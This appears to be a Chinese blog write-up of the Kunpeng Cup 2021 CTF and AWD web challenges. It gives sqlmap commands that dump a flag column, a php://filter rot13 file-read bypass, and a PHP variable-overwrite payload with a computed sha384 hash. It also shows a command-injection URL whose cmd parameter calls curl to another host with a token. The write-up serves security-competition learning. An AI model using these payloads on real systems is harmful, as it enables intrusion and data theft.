
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>鲲鹏杯2021 - H3ppo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="H3ppo,"> 
    <meta name="description" content="CTFWeb1：贪吃蛇Dirsearch: /js/snack.js
有一串js判断丢到控制台运行
点击报错发现DOM树
Web2：SQLsqlmap
sqlmap -u &#34;http://172.3,"> 
    <meta name="author" content="H3ppo"> 
    <link rel="alternative" href="/atom.xml" title="H3ppo" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 5.2.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body class="loading">
    <span id="config-title" style="display:none">H3ppo</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://H3ppo.github.io"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">鲲鹏杯2021</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">鲲鹏杯2021</h1>
        <div class="stuff">
            <span>十月 17, 2021</span>
            

        </div>
        <div class="content markdown">
            <h1 id="CTF"><a href="#CTF" class="headerlink" title="CTF"></a>CTF</h1><h2 id="Web1：贪吃蛇"><a href="#Web1：贪吃蛇" class="headerlink" title="Web1：贪吃蛇"></a>Web1：贪吃蛇</h2><p>Dirsearch: /js/snack.js</p>
<p>有一串js判断丢到控制台运行</p>
<p>点击报错发现DOM树</p>
<h2 id="Web2：SQL"><a href="#Web2：SQL" class="headerlink" title="Web2：SQL"></a>Web2：SQL</h2><p>sqlmap</p>
<pre><code>sqlmap -u "http://172.31.65.174/search.jsp?keyname=" --dbs 
sqlmap -u "http://172.31.65.174/search.jsp?keyname=" -D attackdb --tables 
sqlmap -u "http://172.31.65.174/search.jsp?keyname=" -D attackdb --tables -T db_news 
sqlmap -u "http://172.31.65.174/search.jsp?keyname=" -D attackdb --tables -T db_news --columns 
sqlmap -u "http://172.31.65.174/search.jsp?keyname=" -D attackdb --tables -T db_news --columns -C flag --dump</code></pre>
<h2 id="Web3：可视化监控管理"><a href="#Web3：可视化监控管理" class="headerlink" title="Web3：可视化监控管理"></a>Web3：可视化监控管理</h2><p>Dirsearch: /index.php/login/</p>
<p>访问发现后台index.php?page=index</p>
<pre><code>index.php?page=php://filter/convert.base64-encode/resource=index.php</code></pre>
<p>not the base 应该是过滤了 base</p>
<pre><code>index.php?page=php://filter/read=string.rot13/resource=index.php</code></pre>
<p>查看源码就有密文，解密得到源码：</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
    <span class="token variable">$hashed_key</span> <span class="token operator">=</span> <span class="token string">'df01c5786c5d7d83211a8f5f22f6bdb8468e23494ad698cb86c02d128473beef765952cdd5504cbe4657a6334f6b4f7b'</span><span class="token punctuation">;</span>


    <span class="token variable">$parsed</span> <span class="token operator">=</span> <span class="token function">parse_url</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'REQUEST_URI'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment" spellcheck="true">//parse_url将url解析后，返回一个关联数组，数组中包含query这个字段，用来存储传入的参数值。</span>

    <span class="token variable">$query</span> <span class="token operator">=</span> <span class="token variable">$parsed</span><span class="token punctuation">[</span><span class="token string">"query"</span><span class="token punctuation">]</span><span class="token punctuation">;</span><span class="token comment" spellcheck="true">//[query] => arg=value，将数组中的query字段值赋给变量query</span>


    <span class="token variable">$parsed_query</span> <span class="token operator">=</span> <span class="token function">parse_str</span><span class="token punctuation">(</span><span class="token variable">$query</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment" spellcheck="true">//parse_str() 函数用于把查询字符串解析到变量中，如果没有array 参数，则由该函数设置的变量将覆盖已存在的同名变量</span>
    <span class="token comment" spellcheck="true">//parse_str将字符串解析成多个变量</span>

    <span class="token comment" spellcheck="true">//所有通过url的get方法传入的参数都会经过parse_str方法。使传入的参数值覆盖之前赋的值，从而引发变量覆盖漏洞</span>

    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$parsed_query</span><span class="token operator">!=</span><span class="token keyword">NULL</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
        <span class="token variable">$action</span> <span class="token operator">=</span> <span class="token variable">$parsed_query</span><span class="token punctuation">[</span><span class="token string">'action'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$action</span><span class="token operator">===</span><span class="token string">"auth"</span><span class="token punctuation">)</span><span class="token punctuation">{</span>                         <span class="token comment" spellcheck="true">//$action="auth";</span>
        <span class="token variable">$key</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"key"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>                   <span class="token comment" spellcheck="true">//传入参数为key</span>
        <span class="token variable">$hashed_input</span> <span class="token operator">=</span> <span class="token function">hash</span><span class="token punctuation">(</span><span class="token string">'sha384'</span><span class="token punctuation">,</span> <span class="token variable">$key</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//使用sha384的哈希算法，将key值进行hash运算，生成对应的哈希值 </span>
        <span class="token comment" spellcheck="true">//echo $hashed_input.'\n';</span>

        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$hashed_input</span><span class="token operator">!==</span><span class="token variable">$hashed_key</span><span class="token punctuation">)</span><span class="token punctuation">{</span>  <span class="token comment" spellcheck="true">//hashed_input=hashed_key时，得到flag。</span>
            <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">"no way to get flag!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string">"/flag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  

        <span class="token comment" spellcheck="true">//发现是php的变量覆盖，覆盖action=auth，key=1，hashed_key=sha384的1</span>

    <span class="token punctuation">}</span>
        <span class="token delimiter">?></span>
</code></pre>
<p>利用php脚本来计算出hash中的sha384算法1的hash值，用来覆盖代码中的hash值。Hash值随便构造。以下为hash中的sha384算法1的hash值</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>    
    str <span class="token operator">=</span> <span class="token function">hash</span><span class="token punctuation">(</span><span class="token string">'sha384'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
<span class="token keyword">echo</span> str<span class="token punctuation">;</span>
<span class="token delimiter">?></span>
<span class="token comment" spellcheck="true">//47f05d367b0c32e438fb63e6cf4a5f35c2aa2f90dc7543f8a41a0f95ce8a40a313ab5cf36134a2068c4c969cb50db776</span></code></pre>
<p><strong>payload</strong></p>
<pre><code>index.php?action=auth&amp;key=1&amp;hashed_key=47f05d367b0c32e438fb63e6cf4a5f35c2aa2f90dc7543f8a41a0f95ce8a40a313ab5cf36134a2068c4c969cb50db776</code></pre>
<h1 id="AWD"><a href="#AWD" class="headerlink" title="AWD"></a>AWD</h1><h2 id="Web1"><a href="#Web1" class="headerlink" title="Web1"></a>Web1</h2><h2 id="Web2"><a href="#Web2" class="headerlink" title="Web2"></a>Web2</h2><p><img src="/2021/10/17/kun-peng-bei-2021/image-20211018153408081.png" alt="image-20211018153408081"></p>
<p><img src="/2021/10/17/kun-peng-bei-2021/image-20211018153419396.png" alt="image-20211018153419396"></p>
<pre><code>backend/views/site/fun.php?a=flag&amp;b=sec&amp;cmd=curl 10.120.115.10/index.php?token=108_USR-20211016-eelbz</code></pre>
<p>写脚本批量获取flag</p>
<pre><code>D:\AWD\鲲鹏杯校赛2021</code></pre>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="true">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='//music/1.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r=''
        data-o=''
        data-a=''
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CTF"><span class="toc-number">1.</span> <span class="toc-text">CTF</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web1%EF%BC%9A%E8%B4%AA%E5%90%83%E8%9B%87"><span class="toc-number">1.1.</span> <span class="toc-text">Web1：贪吃蛇</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web2%EF%BC%9ASQL"><span class="toc-number">1.2.</span> <span class="toc-text">Web2：SQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web3%EF%BC%9A%E5%8F%AF%E8%A7%86%E5%8C%96%E7%9B%91%E6%8E%A7%E7%AE%A1%E7%90%86"><span class="toc-number">1.3.</span> <span class="toc-text">Web3：可视化监控管理</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#AWD"><span class="toc-number">2.</span> <span class="toc-text">AWD</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web1"><span class="toc-number">2.1.</span> <span class="toc-text">Web1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web2"><span class="toc-number">2.2.</span> <span class="toc-text">Web2</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
